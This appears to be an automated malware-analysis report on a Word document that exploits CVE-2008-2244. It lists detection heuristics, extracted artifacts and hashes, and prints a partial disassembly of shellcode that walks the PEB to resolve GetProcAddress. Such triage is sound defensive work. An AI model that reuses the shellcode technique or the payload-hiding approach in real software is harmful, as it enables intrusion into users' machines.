Verdict: MALICIOUS
Risk Score: 410

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.005 Visual Basic
The sample is a Microsoft Word document that exploits CVE-2008-2244 to execute an embedded PE executable. The VBA macro is minimal and does not appear to contain malicious logic itself, but the embedded executable is the primary payload. The document body content is unrelated to the malicious functionality.
Heuristics (11)

- CVE-2008-2244 — Microsoft Word record-parsing payload (severity: critical; rule: CVE_2008_2244; tag: CVE likely): Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
- ClamAV: Win.Exploit.MS03-1 (severity: critical; rule: CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Exploit.MS03-1
- Embedded PE executable (severity: critical; rule: OLE_EMBEDDED_EXE): MZ/PE header found inside document; possible embedded executable.
- PEB access via FS segment (x86) (severity: high; rule: SC_PEB_ACCESS): PEB access via FS segment (x86).
  Disassembly:
  Attempted x86 opcode disassembly:
    000019A5  648b1530000000  mov edx, dword ptr fs:[0x30]
    000019AC  e9df020000      jmp 0x1c90
    000019B1  8f85c4feffff    pop dword ptr [ebp - 0x13c]
    000019B7  8b420c          mov eax, dword ptr [edx + 0xc]
    000019BA  8b701c          mov esi, dword ptr [eax + 0x1c]
    000019BD  ad              lodsd eax, dword ptr [esi]
    000019BE  8b7808          mov edi, dword ptr [eax + 8]
    000019C1  89bdccfeffff    mov dword ptr [ebp - 0x134], edi
    000019C7  8b473c          mov eax, dword ptr [edi + 0x3c]
    000019CA  8b540778        mov edx, dword ptr [edi + eax + 0x78]
    000019CE  03d7            add edx, edi
    000019D0  8b5a20          mov ebx, dword ptr [edx + 0x20]
    000019D3  03df            add ebx, edi
    000019D5  33c9            xor ecx, ecx
    000019D7  41              inc ecx
    000019D8  8b348b          mov esi, dword ptr [ebx + ecx*4]
    000019DB  03f7            add esi, edi
    000019DD  b847657450      mov eax, 0x50746547
    000019E2  3b06            cmp eax, dword ptr [esi]
    000019E4  75f1            jne 0x19d7
    000019E6  b8726f6341      mov eax, 0x41636f72
    000019EB  3b4604          cmp eax, dword ptr [esi + 4]
    000019EE  75e7            jne 0x19d7
    000019F0  8b5a24          mov ebx, dword ptr [edx + 0x24]
    000019F3  03df            add ebx, edi
    000019F5  668b0c4b        mov cx, word ptr [ebx + ecx*2]
    000019F9  8b5a1c          mov ebx, dword ptr [edx + 0x1c]
    000019FC  03df            add ebx, edi
    000019FE  8b048b          mov eax, dword ptr [ebx + ecx*4]
    00001A01  03c7            add eax, edi
    00001A03  89              .byte 0x89
    00001A04  85              .byte 0x85
  Note: the two immediates compared in the loop, 0x50746547 and 0x41636f72, are the little-endian ASCII strings "GetP" and "rocA", so this is a PEB walk (fs:[0x30] -> Ldr -> InLoadOrderModuleList) into a module's export name table to locate GetProcAddress by name; the disassembly is cut off at 0x1A03.
- Reference to CreateProcess API (severity: high; rule: SC_STR_CREATEPROCESS): Reference to CreateProcess API.
- Reference to LoadLibrary API (severity: high; rule: SC_STR_LOADLIBRARY): Reference to LoadLibrary API.
- Reference to GetProcAddress API (severity: high; rule: SC_STR_GETPROCADDRESS): Reference to GetProcAddress API.
- OLE document has large unaccounted-for region (severity: high; rule: OLE_SLACK_ANOMALY): OLE file is 48,710 bytes but its declared streams total only 21,777 bytes; 26,933 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Reference to VirtualProtect API (severity: medium; rule: SC_STR_VIRTUALPROTECT): Reference to VirtualProtect API.
- VBA project contains no executable statements (severity: low; rule: OLE_VBA_MACROS): Document contains a VBA project, but the extracted modules contain only attributes, options and comments, and no executable statements.
- Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 369 bytes | 0a0073e6700d52a50d0c1e9ea0537e97be4dbdf563f1ead10aa7aa70adf4375d |
| embedded_office_00006a00.exe | embedded-pe | Office MZ+PE at offset 0x6A00 | 21574 bytes | 9cacee6c891d8ac59e2e7896a746b8da8e66221d5039696f804d5a36ea10b65e |

macros.bas: script preview (first 1,000 lines of the extracted script)
  Attribute VB_Name = "ThisDocument"
  Attribute VB_Base = "1Normal.ThisDocument"
  Attribute VB_GlobalNameSpace = False
  Attribute VB_Creatable = False
  Attribute VB_PredeclaredId = True
  Attribute VB_Exposed = True
  Attribute VB_TemplateDerived = True
  Attribute VB_Customizable = True
  Attribute VB_Control = "PropertyTreeCtl1, 0, 0, PROPERTYTREELib, PropertyTreeCtl"

embedded_office_00006a00.exe: detection
  ClamAV: No threats found
  Obfuscation or payload: likely. Carved artifact entropy is 7.61, consistent with packed or encrypted content.